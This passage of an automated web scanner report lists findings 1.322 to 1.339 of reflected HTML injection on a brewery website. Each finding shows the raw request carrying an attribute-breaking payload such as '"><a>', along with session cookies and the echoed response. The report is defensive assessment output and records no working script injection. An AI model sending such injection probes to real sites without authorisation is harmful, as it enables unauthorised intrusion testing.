Date: Sun, 21 Nov 2010 21:45:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="helpd171a"><a>6ee7d9ed931_page" class="helpd171a">
...[SNIP]...

1.322. http://www.ninkasibrewing.com/help/beer_finder/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/beer_finder/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88caf"><a>00b68d8c362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help88caf"><a>00b68d8c362/beer_finder/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help88caf"><a>00b68d8c362_page" class="help88caf">
...[SNIP]...

1.323. http://www.ninkasibrewing.com/help/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8623a"><a>0cfef24a7a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help8623a"><a>0cfef24a7a5/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help8623a"><a>0cfef24a7a5_page" class="help8623a">
...[SNIP]...

1.324. http://www.ninkasibrewing.com/help/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6325e"><a>44db42daa5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help6325e"><a>44db42daa5a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help6325e"><a>44db42daa5a_page" class="help6325e">
...[SNIP]...

1.325. http://www.ninkasibrewing.com/help/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ae0"><a>a81cb64163d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help41ae0"><a>a81cb64163d/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help41ae0"><a>a81cb64163d_page" class="help41ae0">
...[SNIP]...

1.326. http://www.ninkasibrewing.com/help/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6937c"><a>7458fba0b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help6937c"><a>7458fba0b6b/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help6937c"><a>7458fba0b6b_page" class="help6937c">
...[SNIP]...

1.327. http://www.ninkasibrewing.com/help/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e46"><a>dc8a43dd223 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help55e46"><a>dc8a43dd223/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help55e46"><a>dc8a43dd223_page" class="help55e46">
...[SNIP]...

1.328. http://www.ninkasibrewing.com/help/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99693"><a>74a561e9af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help99693"><a>74a561e9af4/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help99693"><a>74a561e9af4_page" class="help99693">
...[SNIP]...

1.329. http://www.ninkasibrewing.com/home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215e5"><a>88974b7d081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home215e5"><a>88974b7d081/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home215e5"><a>88974b7d081_page" class="home215e5">
...[SNIP]...

1.330. http://www.ninkasibrewing.com/home/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c676"><a>e02e90da893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home1c676"><a>e02e90da893/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home1c676"><a>e02e90da893_page" class="home1c676">
...[SNIP]...

1.331. http://www.ninkasibrewing.com/home/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5e0"><a>d278f502dff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home9a5e0"><a>d278f502dff/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home9a5e0"><a>d278f502dff_page" class="home9a5e0">
...[SNIP]...

1.332. http://www.ninkasibrewing.com/home/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210e2"><a>b548d58de6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home210e2"><a>b548d58de6c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home210e2"><a>b548d58de6c_page" class="home210e2">
...[SNIP]...

1.333. http://www.ninkasibrewing.com/home/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dede"><a>1e7eb0352e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home8dede"><a>1e7eb0352e9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home8dede"><a>1e7eb0352e9_page" class="home8dede">
...[SNIP]...

1.334. http://www.ninkasibrewing.com/home/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbec0"><a>8202d7a7465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homefbec0"><a>8202d7a7465/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="homefbec0"><a>8202d7a7465_page" class="homefbec0">
...[SNIP]...

1.335. http://www.ninkasibrewing.com/home/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 663bc"><a>df79f9bb41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home663bc"><a>df79f9bb41c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home663bc"><a>df79f9bb41c_page" class="home663bc">
...[SNIP]...

1.336. http://www.ninkasibrewing.com/media/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0abf"><a>00dc92c2364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaf0abf"><a>00dc92c2364/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="mediaf0abf"><a>00dc92c2364_page" class="mediaf0abf">
...[SNIP]...

1.337. http://www.ninkasibrewing.com/media/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b99e"><a>d353410d2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media5b99e"><a>d353410d2d6/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="media5b99e"><a>d353410d2d6_page" class="media5b99e">
...[SNIP]...

1.338. http://www.ninkasibrewing.com/media/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a33"><a>5b783fa7801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media94a33"><a>5b783fa7801/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="media94a33"><a>5b783fa7801_page" class="media94a33">
...[SNIP]...

1.339. http://www.ninkasibrewing.com/media/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73fdc"><a>3284c577b00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media73fdc"><a>3284c577b00/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
